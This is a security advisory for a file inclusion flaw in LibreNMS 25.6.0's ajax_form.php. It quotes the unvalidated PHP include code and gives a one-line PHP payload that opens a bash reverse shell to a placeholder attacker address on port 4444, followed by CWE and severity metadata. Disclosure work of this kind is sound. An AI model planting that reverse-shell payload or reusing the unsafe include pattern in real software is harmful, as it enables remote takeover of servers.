LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php
endpoint that permits Remote File Inclusion based on user-controlled POST input.
The application directly uses the type
parameter to dynamically include .inc.php
files from the trusted path includes/html/forms/
, without validation or allowlisting:
if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}
This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.
This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.
includes/html/forms/{type}.inc.php
(or symlink) If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms
user context:
<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>
https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812
include_once
.{ "cwe_ids": [ "CWE-98" ], "nvd_published_at": "2025-07-22T22:15:38Z", "github_reviewed_at": "2025-07-21T21:10:51Z", "github_reviewed": true, "severity": "HIGH" }